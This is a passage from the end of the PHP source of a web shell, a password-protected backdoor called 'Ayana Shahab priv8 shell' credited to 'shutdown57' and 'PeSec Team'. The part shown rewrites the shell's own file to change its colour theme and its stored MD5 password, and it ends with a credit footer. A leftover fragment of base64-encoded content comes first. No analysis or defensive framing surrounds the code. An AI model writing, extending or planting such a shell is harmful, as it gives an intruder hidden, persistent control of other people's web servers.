YT4NCiAgPC9kaXY+DQo8L2Rpdj4gJzs="));
1816}else{
1817$fn=str_replace("/","",$_SERVER['SCRIPT_NAME']);
1818$gc=file_get_contents($fn);
1819$co=str_replace("indigo",$c,$gc);
1820$fp=fopen($fn,"w");
1821if(fwrite($fp, $co)){
1822 echo "<meta http-equiv='refresh' content=0;url='?'>";
1823}else{
1824 echo "gagal";
1825}
1826fclose($fp);
1827}
1828}elseif ($_GET['a']=='pass') {
1829function a_gantipass($old,$new){
1830 $file=str_replace("/","",$_SERVER['SCRIPT_NAME']);
1831 $getc=file_get_contents($file);
1832 $pw=str_replace("".$old."","".$new."",$getc);
1833 $fp=fopen($file,"w");
1834 return fwrite($fp,$pw);
1835 fclose($fp);
1836
1837}
1838echo "<div class='w3-center w3-container'><h3 class='w3-indigo w3-text-shadow'>Change Password</h3>";
1839echo "<form method='post'>";
1840echo "<table class='w3-table w3-border'><tr><td>Old password:</td><td><input type='text' name='op' class='w3-input'></td></tr>";
1841echo"<tr><td>New password:</td><td><input type='text' name='np' class='w3-input'></td></tr>";
1842echo"<tr><td colspan='2'><input type='submit' name='sbmt' class='w3-btn w3-btn-block w3-indigo' value='Change'></td></tr></table></form>";
1843if(isset($_POST['sbmt'])){
1844 $plama=md5($_POST['op']);
1845 $pbaru=md5($_POST['np']);
1846 if(a_gantipass($plama,$pbaru)){
1847 echo "<script>alert('passwordberhasil di ubah!')</script>";
1848 return session_destroy();
1849 }
1850}
1851}
1852}
1853$end_html_a ="<br><br><br><br>";
1854$end_html_a.='<footer class="w3-panel w3-indigo w3-text-shadow w3-text-white w3-center" style="font-size:12px;">copyright © '.date('Y').' PeSec Team | PoweRed by : <a href="http://linuxcode.org" target="_blank">LinuxCode.org</a> | Ayana Shahab priv8 shell By : <a href="https://facebook.com/JKT48.co" >shutdown57</a></footer>';
1855$end_html_a.='</body></html>';
1856echo $end_html_a;
1857?>